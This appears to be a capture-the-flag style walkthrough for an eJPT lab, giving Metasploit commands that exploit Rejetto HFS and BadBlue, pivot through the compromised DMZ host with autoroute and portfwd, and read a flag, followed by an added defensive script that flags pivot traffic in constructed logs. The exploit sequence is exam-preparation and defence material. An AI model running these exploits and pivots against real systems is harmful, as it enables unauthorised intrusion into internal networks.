Exploit and Chill

>Slidin' in the DMZ

Pivoting & Port Forwarding – eJPT Exam Preparation (INE)


command: "ping -c 4 demo1.ine.local"
Checks if the target machine is reachable via ICMP.


command: "nmap demo1.ine.local"
Performs a basic scan to discover open ports on the target machine.

command: "nmap -sV -p80 demo1.ine.local"
Performs service version detection on port 80 to identify the running service.


command: "searchsploit hfs"
Searches for known exploits related to ‘hfs’ using the local exploit database.


command: "msfconsole"
Starts the Metasploit Framework console.

command: "use exploit/windows/http/rejetto_hfs_exec"
Loads the Rejetto HFS exploit module in Metasploit.

command: "set RHOSTS demo1.ine.local"
Sets the target host (RHOSTS) for the exploit module.

command: "exploit"
Runs the exploit, which should give a Meterpreter shell on the target.

command: "ipconfig"
Shows the IP configuration of the compromised system to identify network details.


command: "run autoroute -s 10.0.16.0/20"
Adds a route for 10.0.16.0/20 through the current Meterpreter session, so that Metasploit modules can reach the internal network via the compromised host (pivoting).

command: "background"
Sends the Meterpreter session to the background so we can use other modules.


command: "use auxiliary/scanner/portscan/tcp"
Loads the TCP port scanner module in Metasploit.

command: "use auxiliary/scanner/discovery/arp_scanner"
Loads the ARP scanner module in Metasploit, used for discovering live hosts on the internal network through the pivot.

command: "set RHOSTS demo2.ine.local"
Sets the target to the internal machine (victim machine 2).

command: "set PORTS 1-100"
Specifies the port range to scan (1 to 100).

command: "exploit"
Runs the port scan to discover open ports on the internal machine.


command: "sessions -i 1"
Returns to the existing Meterpreter session.

command: "portfwd add -l 1234 -p 80 -r demo2.ine.local"
Opens local port 1234 on the attacker machine and forwards every connection to it through the Meterpreter session to port 80 on victim 2.

command: "portfwd list"
Lists active port forwarding rules to confirm it’s set up correctly.

command: "nmap -sV -sS -p 1234 localhost"
Scans the locally forwarded port; because the forward relays full TCP connections to victim 2, the service version detected (-sV) is that of the internal host (BadBlue).


command: "searchsploit badblue 2.7"
Searches for known exploits targeting BadBlue 2.7.

command: "use exploit/windows/http/badblue_passthru"
Loads the BadBlue PassThru exploit module.

command: "set PAYLOAD windows/meterpreter/bind_tcp"
Sets the payload to bind TCP (the target listens and the attacker connects in through the pivot route; a reverse payload would require the internal host to reach the attacker directly).

command: "set RHOSTS demo2.ine.local"
Sets the target IP for the BadBlue exploit.

command: "exploit"
Executes the exploit, aiming to get a Meterpreter shell on victim 2.


command: "shell"
Switches from Meterpreter to a normal command shell on the target.

command: "cd /"
Navigates to the root of the current drive (Windows command shell).

command: "dir"
Lists files and directories in the current path.

command: "type flag.txt"
Displays the contents of ‘flag.txt’, revealing the flag.
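Seen from the defender's side, every pivoting step above leaves the same footprint: the DMZ web server (demo1) starts initiating connections into the internal range it was routed to (autoroute 10.0.16.0/20), first across a burst of ports (the PORTS 1-100 scan), then repeatedly to port 80 (traffic relayed by portfwd), and finally to the bind payload's listener. The script below is an added example, not part of the original post or of INE's lab material; it runs a simple detector over constructed connection-log lines. The DMZ subnet (10.0.1.0/24), the host addresses, the log format and Metasploit's default bind port 4444 are assumptions for the sample; only the internal range 10.0.16.0/20 comes from the walkthrough.

```python
"""Flag a DMZ host that behaves like a pivot, from connection logs (added example)."""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

DMZ_NET = ipaddress.ip_network("10.0.1.0/24")        # assumed DMZ segment (constructed)
INTERNAL_NET = ipaddress.ip_network("10.0.16.0/20")  # internal range used by autoroute in the lab


def constructed_sample():
    """Constructed log lines in the form 'timestamp src dst dport proto'."""
    lines = [
        "2024-05-01T09:59:50 198.51.100.7 10.0.1.5 80 tcp",   # normal inbound web hit
        "2024-05-01T09:59:55 10.0.16.20 10.0.16.10 445 tcp",  # normal internal-to-internal traffic
    ]
    # Pivoted port scan: 100 ports of one internal host within a few seconds (PORTS 1-100)
    for port in range(1, 101):
        sec = 2 + port // 40
        lines.append(f"2024-05-01T10:00:{sec:02d} 10.0.1.5 10.0.16.10 {port} tcp")
    # Connections relayed through the port forward: repeated DMZ -> internal hits on port 80
    for sec in (30, 31, 45):
        lines.append(f"2024-05-01T10:01:{sec} 10.0.1.5 10.0.16.10 80 tcp")
    # Connection to the bind payload's listener (4444 is Metasploit's default LPORT; assumed here)
    lines.append("2024-05-01T10:03:10 10.0.1.5 10.0.16.10 4444 tcp")
    return lines


def parse(line):
    """Split one log line into (timestamp, src, dst, dport, proto)."""
    ts, src, dst, dport, proto = line.split()
    return (datetime.fromisoformat(ts), ipaddress.ip_address(src),
            ipaddress.ip_address(dst), int(dport), proto)


def analyze(lines, scan_threshold=20, window=timedelta(seconds=60)):
    """Return findings for DMZ->internal connections and for port sweeps.

    Rule 1 (dmz_to_internal): a DMZ host initiating any connection into the
    internal range violates the segmentation the DMZ exists to enforce.
    Rule 2 (port_sweep): one src->dst pair touching at least `scan_threshold`
    distinct destination ports inside `window` looks like a port scan.
    """
    per_pair = defaultdict(list)          # (src, dst) -> [(timestamp, dport)]
    dmz_to_internal = defaultdict(set)    # src -> {(dst, dport)}
    for line in lines:
        ts, src, dst, dport, _proto = parse(line)
        per_pair[(src, dst)].append((ts, dport))
        if src in DMZ_NET and dst in INTERNAL_NET:
            dmz_to_internal[src].add((dst, dport))

    findings = []
    for src, targets in dmz_to_internal.items():
        findings.append({"rule": "dmz_to_internal", "src": str(src),
                         "count": len(targets),
                         "ports": sorted({port for _, port in targets})})

    for (src, dst), events in per_pair.items():
        events.sort()
        # Sliding window: from each event, count distinct ports seen within `window`
        for i, (t0, _) in enumerate(events):
            ports = {port for t, port in events[i:] if t - t0 <= window}
            if len(ports) >= scan_threshold:
                findings.append({"rule": "port_sweep", "src": str(src), "dst": str(dst),
                                 "distinct_ports": len(ports)})
                break
    return findings


if __name__ == "__main__":
    for finding in analyze(constructed_sample()):
        print(finding)
```

In a real deployment the two rules would be fed from firewall or NetFlow records at the DMZ boundary; the first rule alone catches the pivot regardless of which scanner or payload is used, which is why DMZ-to-internal egress should be denied and alerted on rather than merely logged.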
